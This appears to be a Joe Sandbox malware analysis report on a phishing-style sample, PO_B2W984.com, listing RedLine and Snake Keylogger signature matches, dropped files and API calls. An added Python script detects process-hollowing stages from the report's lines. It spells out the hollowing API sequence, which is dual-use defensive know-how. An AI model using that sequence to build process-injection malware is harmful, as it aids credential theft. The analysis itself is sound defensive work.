Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: PO_B2W984.com | Initial sample: file extension
Source: Trading_AIBot.exe.4.dr, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: apihost.exe.5.dr, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: 5.2.Trading_AIBot.exe.2d6fffc.0.raw.unpack, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: 15.2.rpkhzpuO.pif.2db40808.5.raw.unpack, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: 15.2.rpkhzpuO.pif.2db51c4c.7.raw.unpack, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: 15.2.rpkhzpuO.pif.2db630a8.6.raw.unpack, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File dump: apihost.exe.5.dr 665670656
Source: initial sample | Static PE information: Filename: PO_B2W984.com
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE824C NtReadVirtualMemory
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE84BC NtUnmapViewOfSection
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEDAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEDA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DEDBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE79AC NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE7CF8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DED9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE79AA NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E2824C NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E284BC NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E2DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E2DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E28BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E2DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E279AC NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E27CF8 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E28BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E2D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E279AA NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E3824C NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E384BC NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E3DAC4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E3DA3C RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E38BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E3DBA8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E379AC NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E37CF8 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E38BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E3D9E8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E379AA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DE85D4 CreateProcessAsUserW
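The native-API chains listed above for PO_B2W984.com and Oupzhkpr.PIF are the classic process-hollowing sequence that the report's "Sample uses process hollowing technique" signature refers to: create the target process (the report shows CreateProcessAsUserW), NtUnmapViewOfSection to hollow its image, NtAllocateVirtualMemory and NtWriteVirtualMemory to place the payload, SetThreadContext/Wow64SetThreadContext to repoint the entry point, and NtResumeThread to run it. The script below is an added example, not part of the Joe Sandbox report: it parses "Code function" lines of this shape (including the fused "0_2_02DD20C40_2_02DD20C4" form the extraction produced), collects the APIs each process references, and reports which hollowing stages are evidenced. The per-stage API aliases (VirtualAllocEx, WriteProcessMemory, ZwUnmapViewOfSection and so on) come from general knowledge, not from the report, and the sample lines are transcribed from this report. Note that for Oupzhkpr.PIF the transcribed lines carry no CreateProcess call, so the script reports that chain as incomplete: a missing stage in a static listing lowers confidence but does not rule the technique out.

```python
import re
from collections import defaultdict

# Constructed sample: "Code function" entries transcribed from this report
# (process 0 = PO_B2W984.com, process 12 = Oupzhkpr.PIF), including one line in
# the fused "<id><id>" form that the report extraction produced.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE824C NtReadVirtualMemory,0_2_02DE824C",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE84BC NtUnmapViewOfSection,0_2_02DE84BC",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02DE8BA8",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE79AC NtAllocateVirtualMemory,0_2_02DE79AC",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE7CF8 NtWriteVirtualMemory,0_2_02DE7CF8",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE85D4 CreateProcessAsUserW,0_2_02DE85D4",
    r"Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD20C40_2_02DD20C4",
    r"Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E284BC NtUnmapViewOfSection,12_2_02E284BC",
    r"Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E28BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,12_2_02E28BA8",
    r"Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E279AC NtAllocateVirtualMemory,12_2_02E279AC",
    r"Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E27CF8 NtWriteVirtualMemory,12_2_02E27CF8",
]

# Joe Sandbox function ids are <pid>_<phase>_<8 hex digit address>. Pinning the
# address to exactly 8 digits is what lets the fused "<id><id>" form be split.
FUNC_ID = r"\d+_\d+_[0-9A-F]{8}"
LINE_RE = re.compile(
    r"^Source:\s*(?P<path>.*?)Code function:\s*(?P<fid>" + FUNC_ID + r")\s*(?P<rest>.*)$"
)
FUNC_ID_RE = re.compile("^" + FUNC_ID + "$")

# Stages of process hollowing and the API spellings that evidence each one.
# The Wow64*/Zw*/kernel32 aliases are general knowledge, not taken from the report.
HOLLOWING_STAGES = {
    "create":  {"CreateProcessAsUserW", "CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":   {"NtAllocateVirtualMemory", "VirtualAllocEx"},
    "write":   {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "context": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume":  {"NtResumeThread", "ResumeThread"},
}


def parse_code_functions(lines):
    """Return {(pid, image_name): set_of_api_names} from report 'Code function' lines."""
    apis = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        pid = int(m.group("fid").split("_")[0])
        image = m.group("path").rsplit("\\", 1)[-1]
        for tok in m.group("rest").split(","):
            tok = tok.strip()
            # The trailing repeated id is the report's link text, not an API name.
            if tok and not FUNC_ID_RE.match(tok):
                apis[(pid, image)].add(tok)
    return dict(apis)


def hollowing_stages(api_names):
    """Which hollowing stages are evidenced by this set of API names."""
    return {stage for stage, names in HOLLOWING_STAGES.items() if api_names & names}


def assess(lines):
    """Per process: stages seen, stages missing, and whether the whole chain is present."""
    report = {}
    for key, names in parse_code_functions(lines).items():
        seen = hollowing_stages(names)
        report[key] = {
            "seen": seen,
            "missing": set(HOLLOWING_STAGES) - seen,
            "full_chain": seen == set(HOLLOWING_STAGES),
        }
    return report


if __name__ == "__main__":
    for (pid, image), r in sorted(assess(REPORT_LINES).items()):
        print(f"{image} (pid {pid}): full_chain={r['full_chain']} missing={sorted(r['missing'])}")
```

Keying on stages rather than on exact API names is what makes the check survive the Wow64 and Zw spellings that 32-bit loaders on 64-bit Windows produce; the same stage table can be fed from an API-monitor trace instead of a static listing, in which case a missing "create" stage is a much stronger negative than it is here.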
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: 0_2_02DD20C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 4_1_004073A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_00EAC130
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_00EA9480
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_00EAC121
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_00EA2DD1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_00EA946F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_0521A558
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05218400
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052107C8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052110A8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05214210
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_0521C9E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05216457
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052176E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052176F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_0521A100
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052141FF
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_0521001B
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05210040
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_0521A0F4
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052193E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052183F1
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052193F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052172A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05217290
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05219CA8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05219C98
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05218FA0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05217FA8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05218F90
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05217F98
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05216E38
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05216E48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_052109E8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05219840
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05219850
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05218B38
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05217B40
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05218B48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Code function: 6_2_05217B50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_06CCAAA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_06CCE5D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_06CCAA99
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 12_2_02E120C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_004073A0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_2D4B1020
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_2D4B1030
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_306647A8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_2_306647B8
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_0040DC11
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00407C3F
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00418CCC
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00406CA0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_004028B0
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_0041A4BE
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00418244
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00401650
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00402F20
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_004193C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00418788
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00402F89
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_00402B90
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 15_1_004073A0
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: 16_2_02E220C4
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_00408C60
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: 19_2_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00407C3F19_2_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00418CCC19_2_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00406CA019_2_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004028B019_2_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041A4BE19_2_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041824419_2_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0040165019_2_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402F2019_2_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004193C419_2_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041878819_2_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402F8919_2_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402B9019_2_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004073A019_2_004073A0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064940019_2_30649400
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064102019_2_30641020
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064103019_2_30641030
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_337647B819_2_337647B8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_337647A819_2_337647A8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00408C6019_1_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040DC1119_1_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00407C3F19_1_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00418CCC19_1_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00406CA019_1_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004028B019_1_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041A4BE19_1_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041824419_1_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040165019_1_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402F2019_1_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004193C419_1_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041878819_1_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402F8919_1_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402B9019_1_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004073A019_1_004073A0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Microsofts.exe DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E146A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E1480C appears 619 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E28798 appears 48 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E246A4 appears 154 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E38798 appears 48 times
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Code function: String function: 02E2480C appears 619 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DD46A4 appears 244 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DD480C appears 931 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DE881C appears 45 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DD44AC appears 73 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DE8798 appears 54 times
Source: C:\Users\user\Desktop\PO_B2W984.com | Code function: String function: 02DD44D0 appears 32 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: String function: 0040FB9C appears 50 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: String function: 0040D606 appears 120 times
Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Code function: String function: 0040E1D8 appears 220 times
Source: PO_B2W984.com, 00000000.00000003.22954746218.0000000021C6C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000000.22893328137.0000000000539000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954746218.0000000021C3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22981376617.000000007E730000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020CFE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22897566569.000000007EE4D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22897566569.000000007ED20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22956781562.000000002203F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22898203458.000000007EC38000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
Source: PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
Source: PO_B2W984.com | Binary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
